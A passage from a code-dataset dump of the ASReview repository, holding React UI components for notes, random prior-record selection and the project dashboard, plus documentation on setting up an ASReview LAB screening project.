step *Warm up* is differs slightly from the Oracle and Exploration mode.\nThis step starts the simulation, after some seconds, it will return \"Got it\".\nThis means, the simulation runs further in the background. You are returned to\nthe Analytics page.\n\n.. figure:: ../images/setup_warmup_simulate_background.png\n :alt: ASReview LAB simulation runs in background\n\nThis page now has a refresh button on the top right. If the simulation is not\nfinished yet, you can refresh the page or use the refresh button to follow the\nprogress. After a while, the Elas mascot on the left will hold a sign with\n\"finished\". Your simulation is now finished and you can study the results in\nthe analytics page.\n\n" }, { "alpha_fraction": 0.6119929552078247, "alphanum_fraction": 0.6155202984809875, "avg_line_length": 32.35293960571289, "blob_id": "ed118c2c20ff1b44fb5ba3e6714f859d5010502f", "content_id": "78b48cf57622c02091bb7ea3bbe5bd30e6a556dc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 567, "license_type": "permissive", "max_line_length": 74, "num_lines": 17, "path": "/asreview/webapp/src/Components/InlineErrorHandler.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Link, Stack, Typography } from \"@mui/material\";\nimport { Warning } from \"@mui/icons-material\";\n\nexport default function InlineErrorHandler(props) {\n return (\n <Stack direction=\"row\" spacing={1} sx={{ justifyContent: \"center\" }}>\n <Warning color=\"error\" fontSize=\"small\" />\n <Typography variant=\"body2\">\n {props.message}{\" \"}\n <Link component=\"button\" underline=\"none\" onClick={props.refetch}>\n {props.button ? \"Try to refresh\" : \"\"}\n </Link>\n </Typography>\n </Stack>\n );\n}\n" }, { "alpha_fraction": 0.3969375789165497, "alphanum_fraction": 0.4071456491947174, "avg_line_length": 28.445087432861328, "blob_id": "264e207b872ef0e2ebd2d5980765f62fc474f5ee", "content_id": "8079381604c6ac27f4854af38c4f032ba42cb399", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5094, "license_type": "permissive", "max_line_length": 80, "num_lines": 173, "path": "/asreview/webapp/src/ProjectComponents/HistoryComponents/RecordCardNote.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useParams } from \"react-router-dom\";\nimport {\n Avatar,\n Button,\n Card,\n CardContent,\n Collapse,\n FormControl,\n OutlinedInput,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport ElasAvatar from \"../../images/ElasAvatar.svg\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst RecordCardNote = (props) => {\n const { project_id } = useParams();\n\n const handleClickEditNote = (prevNote, doc_id) => {\n props.setNote({\n data: prevNote,\n editing: doc_id,\n });\n };\n\n const handleClickSaveNote = (prevNote) => {\n if (props.note?.data !== prevNote) {\n props.mutate({\n project_id: project_id,\n doc_id: props.record.id,\n label: props.record.included,\n note: props.note?.data,\n initial: false,\n is_prior: !props.is_prior ? 0 : 1,\n });\n } else {\n props.setNote({\n data: null,\n editing: null,\n });\n }\n };\n\n const handleChangeNote = (event) => {\n props.setNote((s) => {\n return {\n ...s,\n data: event.target.value,\n };\n });\n };\n\n const disableEditNoteButton = () => {\n return (\n props.note?.editing !== null && props.note?.editing !== props.record?.id\n );\n };\n\n return (\n <Root>\n <Collapse\n in={\n props.record?.note !== null ||\n props.record?.id === props.note?.editing\n }\n timeout=\"auto\"\n unmountOnExit\n >\n <CardContent sx={{ padding: \"16px 16px 24px 24px\" }}>\n <Stack direction=\"row\" spacing={!props.mobileScreen ? 3 : 2}>\n <Avatar\n alt=\"user\"\n src={ElasAvatar}\n sx={{\n width: !props.mobileScreen ? 56 : 40,\n height: !props.mobileScreen ? 56 : 40,\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.600\" : \"grey.400\",\n }}\n imgProps={{ sx: { p: 1 } }}\n />\n {props.note?.editing === props.record?.id && (\n <Stack\n direction=\"row\"\n spacing={!props.mobileScreen ? 2 : 1}\n sx={{ alignItems: \"baseline\", width: \"100%\" }}\n >\n <FormControl sx={{ width: \"100%\" }} variant=\"outlined\">\n <OutlinedInput\n autoComplete=\"off\"\n disabled={props.isLoading}\n multiline\n placeholder=\"Write something...\"\n value={!props.note?.data ? \"\" : props.note?.data}\n onChange={handleChangeNote}\n inputProps={{\n sx: {\n lineHeight: (theme) =>\n theme.typography.body1.lineHeight,\n },\n }}\n sx={{ p: 2 }}\n />\n </FormControl>\n <Button\n disabled={props.isLoading}\n onClick={() => handleClickSaveNote(props.record?.note)}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n Save\n </Button>\n </Stack>\n )}\n {props.record?.note && props.note?.editing !== props.record?.id && (\n <Stack\n direction=\"row\"\n spacing={!props.mobileScreen ? 2 : 1}\n sx={{ alignItems: \"baseline\", width: \"100%\" }}\n >\n <Card\n elevation={0}\n sx={{\n borderRadius: 4,\n width: \"100%\",\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\"\n ? \"background.paper\"\n : \"grey.100\",\n }}\n >\n <CardContent sx={{ pb: \"16px !important\" }}>\n <Typography sx={{ color: \"text.secondary\" }}>\n {props.record?.note}\n </Typography>\n </CardContent>\n </Card>\n <Tooltip\n title={\n !disableEditNoteButton()\n ? \"\"\n : \"Save another note before editing\"\n }\n >\n <span>\n <Button\n disabled={disableEditNoteButton()}\n onClick={() =>\n handleClickEditNote(\n props.record?.note,\n props.record?.id,\n )\n }\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n Edit\n </Button>\n </span>\n </Tooltip>\n </Stack>\n )}\n </Stack>\n </CardContent>\n </Collapse>\n </Root>\n );\n};\n\nexport default RecordCardNote;\n" }, { "alpha_fraction": 0.495353639125824, "alphanum_fraction": 0.506066083908081, "avg_line_length": 28.915058135986328, "blob_id": "c60dc446efd8d2a752ecc8870d707adcf479810f", "content_id": "10b2f29ae6e8b7d2970ef87b3b2e36fca91b00ae", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7748, "license_type": "permissive", "max_line_length": 91, "num_lines": 259, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/PriorRandom.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport {\n Box,\n CircularProgress,\n Divider,\n Fade,\n FormControl,\n MenuItem,\n Select,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { ArrowBack } from \"@mui/icons-material\";\n\nimport { InfoCard } from \"../../SetupComponents\";\nimport { InlineErrorHandler } from \"../../../Components\";\nimport { EnoughPriorBanner, PriorUnlabeled } from \"../DataComponents\";\nimport { StyledIconButton } from \"../../../StyledComponents/StyledButton\";\nimport { ProjectAPI } from \"../../../api/index.js\";\nimport { mapStateToProps, projectModes } from \"../../../globals.js\";\nimport { useToggle } from \"../../../hooks/useToggle\";\n\nconst PREFIX = \"PriorRandom\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n recordCard: `${PREFIX}-record-card`,\n infoCard: `${PREFIX}-info-card`,\n empty: `${PREFIX}-empty`,\n loading: `${PREFIX}-loading`,\n select: `${PREFIX}-select`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n height: \"100%\",\n [`& .${classes.root}`]: {\n height: \"100%\",\n },\n\n [`& .${classes.recordCard}`]: {\n alignItems: \"center\",\n height: \"calc(100vh - 208px)\",\n width: \"100%\",\n overflowY: \"scroll\",\n padding: \"32px 24px\",\n [theme.breakpoints.down(\"md\")]: {\n height: \"calc(100% - 56px)\",\n },\n },\n\n [`& .${classes.infoCard}`]: {\n width: \"100%\",\n maxWidth: \"400px\",\n },\n\n [`& .${classes.empty}`]: {\n height: \"calc(100% - 56px)\",\n display: \"flex\",\n alignItems: \"center\",\n justifyContent: \"center\",\n },\n\n [`& .${classes.loading}`]: {\n height: \"calc(100% - 56px)\",\n display: \"flex\",\n alignItems: \"center\",\n justifyContent: \"center\",\n },\n\n [`& .${classes.select}`]: {\n alignItems: \"center\",\n marginLeft: 8,\n width: \"100%\",\n },\n}));\n\nconst PriorRandom = (props) => {\n const queryClient = useQueryClient();\n const [reminder, toggleReminder] = useToggle();\n const [refresh, setRefresh] = React.useState(true);\n const [nRecords, setNRecords] = React.useState(5);\n const [subset, setSubset] = React.useState(\"relevant\");\n\n const { data, error, isError, isFetched, isFetching, isSuccess } = useQuery(\n [\n \"fetchPriorRandom\",\n {\n project_id: props.project_id,\n n: nRecords,\n subset: props.mode !== projectModes.ORACLE ? subset : null,\n },\n ],\n ProjectAPI.fetchPriorRandom,\n {\n enabled: refresh,\n onSuccess: () => {\n setRefresh(false);\n },\n refetchOnWindowFocus: false,\n },\n );\n\n const handleNRecordsChange = (event) => {\n setNRecords(event.target.value);\n setRefresh(true);\n };\n\n const handleSubsetChange = (event) => {\n setSubset(event.target.value);\n setRefresh(true);\n };\n\n const refetchPriorRandom = () => {\n queryClient.resetQueries(\"fetchPriorRandom\");\n };\n\n const onClickPriorSearch = () => {\n props.toggleSearch();\n props.toggleRandom();\n };\n\n React.useEffect(() => {\n if (\n props.mode === projectModes.ORACLE &&\n props.n_prior_exclusions !== 0 &&\n props.n_prior_exclusions % 5 === 0\n ) {\n toggleReminder();\n }\n }, [props.mode, props.n_prior_exclusions, toggleReminder]);\n\n React.useEffect(() => {\n if (\n data?.result.length &&\n !data?.result.filter((record) => record?.included === null).length\n ) {\n setRefresh(true);\n }\n }, [data?.result]);\n\n return (\n <Root>\n <Fade in>\n <Box className={classes.root}>\n <Stack direction=\"row\" sx={{ p: \"4px 16px\" }}>\n <Tooltip title=\"Select another way\">\n <StyledIconButton onClick={props.toggleRandom}>\n <ArrowBack />\n </StyledIconButton>\n </Tooltip>\n <Stack className={classes.select} direction=\"row\" spacing={1}>\n <Typography sx={{ color: \"text.secondary\" }}>Show</Typography>\n <FormControl variant=\"standard\" sx={{ width: \"48px\" }}>\n <Select value={nRecords} onChange={handleNRecordsChange}>\n <MenuItem value={1}>1</MenuItem>\n <MenuItem value={2}>2</MenuItem>\n <MenuItem value={3}>3</MenuItem>\n <MenuItem value={4}>4</MenuItem>\n <MenuItem value={5}>5</MenuItem>\n <MenuItem value={6}>6</MenuItem>\n <MenuItem value={7}>7</MenuItem>\n <MenuItem value={8}>8</MenuItem>\n <MenuItem value={9}>9</MenuItem>\n <MenuItem value={10}>10</MenuItem>\n </Select>\n </FormControl>\n <Typography sx={{ color: \"text.secondary\" }}>\n {props.mode === projectModes.ORACLE\n ? \"random records\"\n : \"random\"}\n </Typography>\n {props.mode !== projectModes.ORACLE && (\n <Stack\n direction=\"row\"\n spacing={1}\n sx={{ alignItems: \"center\" }}\n >\n <FormControl variant=\"standard\" sx={{ width: \"96px\" }}>\n <Select value={subset} onChange={handleSubsetChange}>\n <MenuItem value=\"relevant\">relevant</MenuItem>\n <MenuItem value=\"irrelevant\">irrelevant</MenuItem>\n </Select>\n </FormControl>\n <Typography sx={{ color: \"text.secondary\" }}>\n records\n </Typography>\n </Stack>\n )}\n </Stack>\n </Stack>\n <Divider />\n {isFetching && !isError && (\n <Box className={classes.loading}>\n <CircularProgress />\n </Box>\n )}\n {!isFetching && isError && (\n <Box className={classes.empty}>\n <InlineErrorHandler\n message={error[\"message\"]}\n refetch={refetchPriorRandom}\n button={true}\n />\n </Box>\n )}\n <EnoughPriorBanner\n n_prior_exclusions={props.n_prior_exclusions}\n onClickPriorSearch={onClickPriorSearch}\n reminder={reminder}\n toggleReminder={toggleReminder}\n />\n {!reminder &&\n !isError &&\n isFetched &&\n isSuccess &&\n data?.result.length !== 0 && (\n <Stack\n className={classes.recordCard}\n aria-label=\"unlabeled record card\"\n spacing={3}\n >\n <Box className={classes.infoCard}>\n <InfoCard info=\"Label records that you want to use as prior knowledge\" />\n </Box>\n {data?.result\n .filter((record) => record?.included === null)\n .map((record, index) => (\n <PriorUnlabeled\n record={record}\n mode={props.mode}\n nRecords={nRecords}\n subset={subset}\n key={`result-page-${index}`}\n />\n ))}\n </Stack>\n )}\n {!reminder &&\n !isError &&\n isFetched &&\n isSuccess &&\n data?.result.length === 0 && (\n <Box className={classes.empty}>\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n No unlabeled records found\n </Typography>\n </Box>\n )}\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(PriorRandom);\n" }, { "alpha_fraction": 0.7526237964630127, "alphanum_fraction": 0.7574438452720642, "avg_line_length": 38.578460693359375, "blob_id": "34aa799207f0b765a61aa380c37b8d4db6d7d2bf", "content_id": "5bcc2c834fb5d2cc5565db588bca25442de75116", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 12864, "license_type": "permissive", "max_line_length": 159, "num_lines": 325, "path": "/docs/source/project_create.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "****************\nCreate a project\n****************\n\nTo start reviewing a dataset with ASReview LAB, you first need to create a\nproject. The project will contain your dataset, settings, labeling decisions,\nand machine learning models. You can choose from three different project\ntypes: Oracle, Exploration, and Simulation. The project setup consists of\n4 steps: Project information, Data, Model, and Warm up. The sections below\nexplain each of the steps of the setup.\n\nTo create a project:\n\n1. :doc:`start`.\n2. Go to the *Projects dashboard* if you are not already there (http://localhost:5000/projects)\n3. Click on the *Create* button on the bottom left\n\nProject information\n===================\n\nIn Step 1, you provide all relevant information about your project as\nwell as the type of project you want (the mode). The sections below provide\nmore information on the input fields. After you complete this step, click\n*next*.\n\nProject modes\n-------------\n\nIn this step, you have to select a mode. The default is **Oracle**. Oracle mode\nis used to screen an unlabeled dataset with the help of AI (it's fine if you\nalready have labels, these will used as prior knowledge). The other\ntwo modes, Simulation and Exploration, require fully labeled datasets. They\nare useful for teaching purposes or studying the performance of active\nlearning in a simulation study.\n\nIn short:\n\n- You have an Unlabeled, or :ref:`data_labeled:Partially labeled data` -> Oracle\n- You have a :ref:`data_labeled:Fully labeled data` -> Simulation or Exploration.\n\n.. figure:: ../images/setup_project_modes.png\n :alt: Project modes\n\n\nProject details\n---------------\n\nProvide project details like name of the project (required), author(s) (for\nexample, the name of the screener), and a description. You can edit these\nvalues later in the *Details* page.\n\n\nData\n====\n\nIn Step 2, you import a dataset and select prior knowledge.\n\nAdd Dataset\n-----------\n\nClick on *Add* to select a dataset. The data needs to adhere to a\n:doc:`specific format <data>`.\n\nDepending on the :ref:`Project mode <project_create:Project modes>`, you are\noffered the following options for adding a dataset. Keep in mind that in Oracle\nmode, your dataset is unlabeled or :ref:`data_labeled:Partially labeled data`. For Exploration and Simulation mode, you need :ref:`data_labeled:Fully labeled\ndata`.\n\n.. tip::\n\n You will benefit most from what active learning has to offer with :ref:`data:High-quality data`.\n\n\nFrom File\n~~~~~~~~~\n\nDrag and drop your file or select your file. Click on *Save* on the top right.\n\nFrom URL or DOI\n~~~~~~~~~~~~~~~\n\nInsert a URL to a dataset. For example, use a URL from this\n`dataset repository <https://github.com/asreview/systematic-review-datasets>`__.\nIt is also possible to provide a DOI to a data repository (supported for many\ndata repositories via `Datahugger <https://github.com/J535D165/datahugger>`__).\nIn a DOI points to multiple files, select the file you want to use (e.g.\n`10.17605/OSF.IO/WDZH5 <https://doi.org/10.17605/OSF.IO/WDZH5>`__).\n\nClick on *Add* to add the dataset.\n\nFrom Extension\n~~~~~~~~~~~~~~\n\nOracle and Exploration only. Select a file available via an extension. Click\non *Save* on the top right.\n\nBenchmark Datasets\n~~~~~~~~~~~~~~~~~~\n\nFor Simulation and Exploration only. Select one of the\n:ref:`data_labeled:benchmark datasets`. Click\non *Save* on the top right.\n\n.. note::\n After adding your dataset, ASReview LAB shows the approximate number of duplicates.\n This number is based on duplicate titles and abstracts and if available, on the Digital Object Identifier (`DOI <https://www.doi.org/>`_).\n Removing duplicates can be done via `ASReview Datatools <https://github.com/asreview/asreview-datatools>`_,\n which also allows using a persistent identifier (PID) other than DOI for\n identifying and removing duplicates.\n\n\nSelect Prior Knowledge\n----------------------\n\n.. note::\n If you use :ref:`data_labeled:Partially labeled data` you can skip this step. \n\nThe first iteration of the active learning cycle requires training data,\nreferred to as prior knowledge. This knowledge is used by the classifier to\ncreate an initial ranking of the unseen records. In this step, you need to\nprovide a minimum training data set of size two, with **at least** one\nrelevant and one irrelevant labeled record.\n\nTo facilitate prior selection, it is possible to search within your dataset.\nThis is especially useful for finding records that are relevant based on\nprevious studies or expert consensus. \n\nYou can also let ASReview LAB present you with random documents. This can be\nuseful for finding irrelevant records.\n\nThe interface works as follows; on the left, you will see methods to find\nrecords to use as prior knowledge, on the right, you will see your selected\nprior knowledge. If you have **at least** one relevant and one irrelevant\nrecord, you can click *Close* and go to the next step. \n\n.. figure:: ../images/setup_prior.png\n :alt: ASReview prior knowledge selector\n\n\nSearch\n~~~~~~\n\nLet's start with finding a prior relevant document. The most efficient way\nto do this is by searching for a specific document that you already know is\nrelevant. Click on Search and search your dataset by authors,\nkeywords or title, or a combination thereof. Make sure to be precise\nwith the search terms, as only the first 10 results are shown to you.\nAfter entering your search terms, press enter to start searching.\n\n\n.. figure:: ../images/setup_prior_search_empty.png\n :alt: ASReview prior knowledge search\n\n\nClick the document you had in mind and answer, \"Is this record relevant?\".\nNote, don't label all items here. Only the one you are looking for and want to\nuse as training data.\n\nThe prior knowledge will now show up on the right. There are no restrictions\non the number of records and the software already works with 2 labels (1\nrelevant and 1 irrelevant). \n\nIf you are done searching prior knowledge, click *Close*.\n\n.. figure:: ../images/setup_prior_search_1rel.png\n :alt: ASReview prior knowledge search 1 relevant\n\nRandom\n~~~~~~\n\n.. warning::\n Do not use the random option to search for the sparse relevant records!\n\n\nYou also need to provide at least one prior irrelevant document. One way to\nfind an irrelevant document is by labeling a set of random records from the\ndataset. Given that the majority of records in the dataset are irrelevant\n(extremely imbalanced data problem), the records presented here are likely to\nbe irrelevant for your study. Click on *random* to show a few random records.\nIndicate for each record you want to use as training data whether it is\nirrelevant (or relevant).\n\n.. figure:: ../images/setup_prior_random_1rel.png\n :alt: ASReview prior knowledge random\n\nThe prior knowledge will now show up on the right. Use the buttons to see all\nprior knowledge or irrelevant items. There are no restrictions on the number\nof records you provide, and the software already works with 2 labeled\nrecords (1 relevant and 1 irrelevant). \n\nAfter labeling five randomly selected records, ASReview LAB will ask you\nwhether you want to stop searching prior knowledge. Click on *STOP* and\nclick *Next*.\n\nIf you are done, click *Close*.\n\nModel\n=====\n\nIn the next step of the setup, you can select the active learning model. The\ndefault settings (Naïve Bayes, TF-IDF, Max) have fast and excellent\nperformance. Most users can skip this step and click *Next*. More information\nabout the active learning process can be found in the blog post `Active learning explained <https://asreview.nl/blog/active-learning-explained/>`_, \n\nSelect model\n------------\n\nIt is possible to change the settings of the Active learning model. There are\nfour settings that can be changed in the software: \n\n\nFeature extraction\n~~~~~~~~~~~~~~~~~~\n\nThe feature extraction technique determines the method how text is translated\ninto a vector that can be used by the classifier. The default is TF-IDF (Term\nFrequency-Inverse Document Frequency) from `SKLearn <https://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.TfidfVectorizer.html>`_.\nIt works well in combination with Naive Bayes and other fast training models.\n\nAnother recommended option is Doc2Vec provided by the `gensim <https://radimrehurek.com/gensim/>`_\npackage. Before starting ASReview LAB, first, install *gensim*:\n\n.. code:: bash\n\n pip install gensim\n\n.. note::\n\n It takes relatively long to create a feature matrix with Doc2Vec, but this\n only has to be done once. The upside of this method is that it takes context\n into account. Also, a benefit is the dimension-reduction that generally\n takes place, which makes the modeling quicker.\n\nSeveral other feature extractors are available in the software (sentence Bert,\nembedding IDF/LSTM) and more classifiers can be selected via the :doc:`API\n<reference>`, or added via an :ref:`extensions_dev:model extensions`. \n\nClassifier\n~~~~~~~~~~\n\nThe classifier is the machine learning model used to compute the relevance\nscores. The default is Naive Bayes. Though relatively simplistic, it seems to\nwork quite well on a wide range of datasets. Several other classifiers are\navailable in the software (logistic regression, random forest, SVM, LSTM,\nneural net) and more classifiers can be selected via the :doc:`API\n<reference>` or added via an :ref:`extensions_dev:model extensions`. \n\nThe neural nets require `tensorflow <https://www.tensorflow.org/>`_, use\n\n.. code:: bash\n\n pip install tensorflow\n\n\nBalancing Strategy\n~~~~~~~~~~~~~~~~~~\n\nTo decrease the class imbalance in the training data, the default is to\nrebalance the training set by a technique called dynamic resampling (DR)\n(`Ferdinands et al., 2020 <https://doi.org/10.31219/osf.io/w6qbg>`_). DR\nundersamples the number of irrelevant records in the training data, whereas\nthe number of relevant records are oversampled such that the size of the\ntraining data remains the same. The ratio between relevant and irrelevant\nrecords in the rebalanced training data is not fixed, but dynamically updated\nand depends on the number of records in the available training data, the total\nnumber of records in the dataset, and the ratio between relevant and\nirrelevant records in the available training data. No balancing or\nundersampling are the other options. Other strategies can be selected via the\n:doc:`API <reference>` or added via an :ref:`extensions_dev:model extensions`.\n\n\nQuery Strategy\n~~~~~~~~~~~~~~\n\nThe query strategy determines which document is shown after the model has\ncomputed the relevance scores. The options are: maximum (certainty-based),\nuncertainty, random, and clustering. When certainty-based is selected, the\ndocuments are shown in the order of relevance score. The document most likely\nto be relevant is shown first. When mixed is selected, the next document will\nbe selected certainty-based 95% of the time, and uncertainty based or randomly\nchosen otherwise. When random is selected, documents are shown in a random\norder (ignoring the model output completely). Other strategies can be selected\nvia the :doc:`API <reference>` or added via an :ref:`extensions_dev:model\nextensions`.\n\n.. warning::\n Selecting *random* means your review will not be accelerated by using ASReview.\n\nModel switching \n~~~~~~~~~~~~~~~\n\nDuring the screening phase, it is not possible to change the model. However,\nit is possible to select a first model, screen part of the data, and export\nthe dataset with the labeling decisions of the first model. This\npartly-labeled dataset can be imported into a new project and the labels based\non the first model will be recognized as prior knowledge. Then, a second model\ncan be trained on the partly-labeled data, and the new predictions will be\nbased on the second model.\n\n.. tip::\n\n It is suggested to screen with a simple active learning model (e.g.,\n the defaults) first until you reach your stopping criteria, then switch to a\n different model (e.g., doc2vec plus a neural net) and screen again until\n you reach your stopping criteria.\n\nWarm up\n=======\n\nIn the last step of the setup, step 4, ASReview LAB runs the feature extractor\nand trains a model, and ranks the records in your dataset. Depending on the\nmodel and the size of your dataset, this can take a couple of minutes (or even\nlonger; you can enjoy the `animation video <https://www.youtube.com/watch?v=k-a2SCq-LtA>`_). After the project is successfully\ninitialized, you can start reviewing.\n\n.. note::\n\n In Simulation mode, this step starts the simulation. As simulations usually\n take longer to complete, the simulation will run in the background. After a\n couple of seconds, you will see a message and a button \"Got it\". You will\n navigate to the :ref:`progress:Analytics` page, where you can follow the\n progress (see *Refresh* button on the top right)\n\n.. figure:: ../images/setup_warmup.png\n :alt: ASReview LAB warmup\n" }, { "alpha_fraction": 0.4757286012172699, "alphanum_fraction": 0.48027363419532776, "avg_line_length": 31.533536911010742, "blob_id": "7559eef49fba6da660f66e88cf4f34bce0bdef73", "content_id": "facb83ef7ef7ef0b845530e6e19b6f0305d0453e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 21342, "license_type": "permissive", "max_line_length": 83, "num_lines": 656, "path": "/asreview/webapp/src/HomeComponents/DashboardComponents/ProjectTable.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useMutation, useQuery, useQueries, useQueryClient } from \"react-query\";\nimport { connect, useSelector, useDispatch } from \"react-redux\";\nimport { useNavigate } from \"react-router-dom\";\nimport {\n Box,\n Button,\n Chip,\n CircularProgress,\n Paper,\n Table,\n TableBody,\n TableCell,\n TableContainer,\n TableHead,\n TablePagination,\n TableRow,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { BoxErrorHandler, DialogErrorHandler } from \"../../Components\";\nimport { ProjectDeleteDialog } from \"../../ProjectComponents\";\nimport { ProjectCheckDialog, TableRowButton } from \"../DashboardComponents\";\nimport { ProjectAPI } from \"../../api/index.js\";\nimport { useRowsPerPage } from \"../../hooks/SettingsHooks\";\nimport { useToggle } from \"../../hooks/useToggle\";\nimport ElasArrowRightAhead from \"../../images/ElasArrowRightAhead.svg\";\nimport {\n checkIfSimulationFinishedDuration,\n mapDispatchToProps,\n projectModes,\n projectStatuses,\n formatDate,\n} from \"../../globals\";\nimport useAuth from \"../../hooks/useAuth\";\nimport { setMyProjects } from \"../../redux/actions\";\n\nconst PREFIX = \"ProjectTable\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n error: `${PREFIX}-error`,\n table: `${PREFIX}-table`,\n tableCell: `${PREFIX}-tableCell`,\n converting: `${PREFIX}-converting`,\n img: `${PREFIX}-img`,\n title: `${PREFIX}-title`,\n titleWrapper: `${PREFIX}-title-wrapper`,\n loadingProjects: `${PREFIX}-loading-projects`,\n};\n\nconst StyledPaper = styled(Paper)(({ theme }) => ({\n [`&.${classes.root}`]: {\n width: \"100%\",\n borderRadius: 16,\n marginBottom: 64,\n },\n\n [`& .${classes.error}`]: {\n display: \"flex\",\n justifyContent: \"center\",\n paddingTop: 64,\n paddingBottom: 132,\n },\n\n [`& .${classes.table}`]: {\n minWidth: 700,\n },\n\n [`& .${classes.tableCell}`]: {\n letterSpacing: \"0.25px\",\n },\n\n [`& .${classes.converting}`]: {\n display: \"flex\",\n alignItems: \"center\",\n },\n\n [`& .${classes.img}`]: {\n maxWidth: 140,\n marginTop: 8,\n marginBottom: 64,\n marginLeft: 100,\n },\n\n [`& .${classes.title}`]: {\n cursor: \"pointer\",\n display: \"-webkit-box\",\n letterSpacing: \"0.25px\",\n WebkitBoxOrient: \"vertical\",\n WebkitLineClamp: 1,\n whiteSpace: \"pre-line\",\n overflow: \"hidden\",\n },\n\n [`& .${classes.titleWrapper}`]: {\n display: \"flex\",\n alignItems: \"center\",\n width: \"100%\",\n },\n\n [`& .${classes.loadingProjects}`]: {\n display: \"flex\",\n justifyContent: \"center\",\n paddingTop: 64,\n paddingBottom: 248,\n },\n}));\n\nconst columns = [\n { id: \"name\", label: \"Project\", width: \"55%\" },\n { id: \"created_at_unix\", label: \"Date\", width: \"15%\" },\n { id: \"mode\", label: \"Mode\", width: \"15%\" },\n { id: \"status\", label: \"Status\", width: \"15%\" },\n];\n\nconst ProjectTable = (props) => {\n const navigate = useNavigate();\n const queryClient = useQueryClient();\n const authenticated = useSelector((state) => state.authentication);\n const myProjects = useSelector((state) => state.myProjects);\n const dispatch = useDispatch();\n const { auth } = useAuth();\n\n /**\n * Project table state\n */\n const [page, setPage] = React.useState(0);\n const [hoverRowId, setHoverRowId] = React.useState(null);\n const [hoverRowIdPersistent, setHoverRowIdPersistent] = React.useState(null);\n const [hoverRowTitle, setHoverRowTitle] = React.useState(null);\n const [hoverIsOwner, setHoverIsOwner] = React.useState(false);\n const [rowsPerPage, handleRowsPerPage] = useRowsPerPage();\n\n /**\n * Dialog state\n */\n const [onDeleteDialog, toggleDeleteDialog] = useToggle();\n\n /**\n * Simulation status query state\n */\n const [querySimulationFinished, setQuerySimulationFinished] = React.useState(\n [],\n );\n const [querySimulationError, setQuerySimulationError] = React.useState({\n isError: false,\n message: null,\n });\n\n /**\n * Fetch projects and check if simulation running in the background\n */\n const { error, isError, isFetched, isFetching, isSuccess } = useQuery(\n \"fetchProjects\",\n ProjectAPI.fetchProjects,\n {\n onError: () => {\n setQuerySimulationFinished([]);\n },\n onSuccess: (data) => {\n // set in redux store\n dispatch(setMyProjects(data.result));\n // reset query for fetching simulation project(s) status\n setQuerySimulationFinished([]);\n // get simulation project(s) running in the background\n const simulationProjects = data.result.filter(\n (element) =>\n element.mode === projectModes.SIMULATION &&\n element.reviews[0] !== undefined &&\n element.reviews[0].status === projectStatuses.REVIEW,\n );\n if (!simulationProjects.length) {\n console.log(\"No simulation running\");\n } else {\n const simulationQueries = [];\n const project_id = simulationProjects.map((element) => element.id);\n // prepare query array for fetching simulation project(s) status\n for (let key in project_id) {\n // reset query if error\n if (querySimulationError.isError) {\n queryClient.resetQueries(`fetchProjectStatus-${project_id[key]}`);\n setQuerySimulationError({\n isError: false,\n message: null,\n });\n }\n // update query array\n simulationQueries.push({\n queryKey: [\n `fetchProjectStatus-${project_id[key]}`,\n { project_id: project_id[key] },\n ],\n queryFn: ProjectAPI.fetchProjectStatus,\n enabled: project_id[key] !== null,\n onError: (error) => {\n setQuerySimulationError({\n isError: true,\n message: error.message,\n });\n },\n onSuccess: (data) => {\n if (data[\"status\"] === projectStatuses.FINISHED) {\n // simulation finished\n queryClient.invalidateQueries(\"fetchDashboardStats\");\n // update cached data\n queryClient.setQueryData(\"fetchProjects\", (prev) => {\n return {\n ...prev,\n result: prev.result.map((project) => {\n return {\n ...project,\n reviews: project.reviews.map((review) => {\n return {\n ...review,\n status:\n project.id === project_id[key]\n ? projectStatuses.FINISHED\n : review.status,\n };\n }),\n };\n }),\n };\n });\n } else {\n // not finished yet\n setTimeout(\n () =>\n queryClient.invalidateQueries(\n `fetchProjectStatus-${project_id[key]}`,\n ),\n checkIfSimulationFinishedDuration,\n );\n }\n },\n refetchOnWindowFocus: false,\n });\n }\n // pass prepared query array\n setQuerySimulationFinished(simulationQueries);\n }\n },\n refetchOnWindowFocus: false,\n },\n );\n\n /**\n * Fetch if simulation project(s) finished\n */\n useQueries(querySimulationFinished);\n\n const { mutate: mutateStatus } = useMutation(ProjectAPI.mutateProjectStatus, {\n onError: (error) => {\n props.setFeedbackBar({\n open: true,\n message: error.message,\n });\n },\n onSuccess: (data, variables) => {\n queryClient.invalidateQueries(\"fetchDashboardStats\");\n // update cached data\n 